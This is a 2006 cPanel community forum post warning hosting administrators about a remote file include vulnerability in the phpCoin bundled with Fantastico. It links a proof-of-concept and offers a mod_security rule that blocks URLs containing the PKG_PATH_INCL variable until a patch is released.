The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

SECURITY ISSUE: phpCoin Remote File Include Vuln

Discussion in 'Security' started by cmeisinger, Aug 26, 2006.

  1. cmeisinger

    cmeisinger Registered

    Joined:
    Nov 29, 2004
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

    Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt

    Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your modsecurty configuration.



    SecFilter "PKG_PATH_INCL"



    That should take care of it until Fantastico/PHPCoin releases an update.

    Chris Meisinger
    WingSix Hosting
    www.wingsix.com


    edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

    Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now i'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
     
    #1 cmeisinger, Aug 26, 2006
    Last edited: Aug 26, 2006
Loading...

Share This Page